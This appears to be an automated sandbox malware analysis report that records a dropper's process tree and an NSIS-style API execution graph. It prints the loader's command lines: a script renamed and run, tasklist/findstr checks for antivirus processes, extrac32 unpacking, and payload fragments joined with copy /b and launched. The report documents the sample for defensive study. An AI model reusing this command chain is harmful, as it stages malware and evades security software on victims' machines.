                                                                                                                                                                      Data Ascii: Zr1KIYdASWN31fGIDxWIpoLKGifjtt07YDu9q8LhNmGODe7VF61QIzedde1raOCqdidnSgZ2VL9AAy1Tt8RDFeJh3uF+DQX7hz2VRAetlAamDwqjC8bEb9ADRbsymVZlc50Hea4kQYaOzZno8oWABpbfY2+aZqCzvEv9IxoxO9FSUUIdjyW53ybhtXibePQuXnJCO39GsG90a3jHBkA3dHbRysyPhHU7vznt/BMV8Cr+/0KjA6o87xH3CPOLwaM


                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:03:33:10
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\vUcZzNWkKc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\vUcZzNWkKc.exe"
                                                                                                                                                                      Imagebase:0x610000
                                                                                                                                                                      File size:7'088'640 bytes
                                                                                                                                                                      MD5 hash:2882EAD03A58608F2F73C66B861299A3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:03:33:12
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1'062'983 bytes
                                                                                                                                                                      MD5 hash:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 11%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:03:33:13
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Set-up.exe"
                                                                                                                                                                      Imagebase:0xdf0000
                                                                                                                                                                      File size:6'851'208 bytes
                                                                                                                                                                      MD5 hash:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 70%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:03:33:13
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:03:33:13
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:03:33:15
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                      Imagebase:0xb40000
                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:03:33:15
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                      Imagebase:0x970000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:03:33:16
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:tasklist
                                                                                                                                                                      Imagebase:0xb40000
                                                                                                                                                                      File size:79'360 bytes
                                                                                                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:03:33:16
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                      Imagebase:0x970000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:03:33:18
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd /c md 768400
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:03:33:18
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:extrac32 /Y /E Reflect
                                                                                                                                                                      Imagebase:0xcf0000
                                                                                                                                                                      File size:29'184 bytes
                                                                                                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:03:33:19
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:findstr /V "cocks" Articles
                                                                                                                                                                      Imagebase:0x970000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:12
                                                                                                                                                                      Start time:03:33:19
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
                                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:13
                                                                                                                                                                      Start time:03:33:19
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:Climb.com V
                                                                                                                                                                      Imagebase:0xa20000
                                                                                                                                                                      File size:947'288 bytes
                                                                                                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:03:33:19
                                                                                                                                                                      Start date:28/12/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                                                      Imagebase:0x5b0000
                                                                                                                                                                      File size:28'160 bytes
                                                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Reset < >
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 8bq
                                                                                                                                                                        • API String ID: 0-187764589
                                                                                                                                                                        • Opcode ID: 8a5240be9df7a7f5f99d2d2433717d3f49119b0f5654b58c247032d9bc484268
                                                                                                                                                                        • Instruction ID: 404307ebfc6026a9e300904e947a758ce38123b5f6f616a834e233dc9717559f
                                                                                                                                                                        • Opcode Fuzzy Hash: 8a5240be9df7a7f5f99d2d2433717d3f49119b0f5654b58c247032d9bc484268
                                                                                                                                                                        • Instruction Fuzzy Hash: A4618C717142009FCB1CEB69E08DA29BBA7BF88304F558469E54A9B391DF70EC45CBD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e19f86b388a14991f4d4964fb6f00ba8eb0929a28a3e48d9c2446582cf7b9ccf
                                                                                                                                                                        • Instruction ID: f25fcc42650652f3f5f4f79ce831d213eb3fb5567e20587814a4f5cf059e2eec
                                                                                                                                                                        • Opcode Fuzzy Hash: e19f86b388a14991f4d4964fb6f00ba8eb0929a28a3e48d9c2446582cf7b9ccf
                                                                                                                                                                        • Instruction Fuzzy Hash: 89514B34A00349CFCB06DFB8E59569EBBB2FF45308F108569D004AB394EB35A94ACF91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e11fa3e0519aa6f9bfc23fc4933c8740c6791b4b218b173d3ebdf05190586ee1
                                                                                                                                                                        • Instruction ID: 1900c4b8f50843c4026289f1c2cd7069fa0fb1735572b0bc7881d7ce588edaa2
                                                                                                                                                                        • Opcode Fuzzy Hash: e11fa3e0519aa6f9bfc23fc4933c8740c6791b4b218b173d3ebdf05190586ee1
                                                                                                                                                                        • Instruction Fuzzy Hash: 92411D34A00309CFCB05DFA8E595A9EBBB2FF45308F508569D504AB394EB35A94ACF91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b93d2adabb78f4633055a120404e7ee991e266f5634b246c1caf2c733cf548c9
                                                                                                                                                                        • Instruction ID: afabd710f0eacf4f37ad8e60e6afdff0f1e07df4f4550142a8b1f78c99e56d1c
                                                                                                                                                                        • Opcode Fuzzy Hash: b93d2adabb78f4633055a120404e7ee991e266f5634b246c1caf2c733cf548c9
                                                                                                                                                                        • Instruction Fuzzy Hash: DF31FFB57042158BCF08DBADD988AAEBBE6EF84214F148026E519D7341DB30EE468BD1

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:17.6%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:21%
                                                                                                                                                                        Total number of Nodes:1482
                                                                                                                                                                        Total number of Limit Nodes:26
                                                                                                                                                                        execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 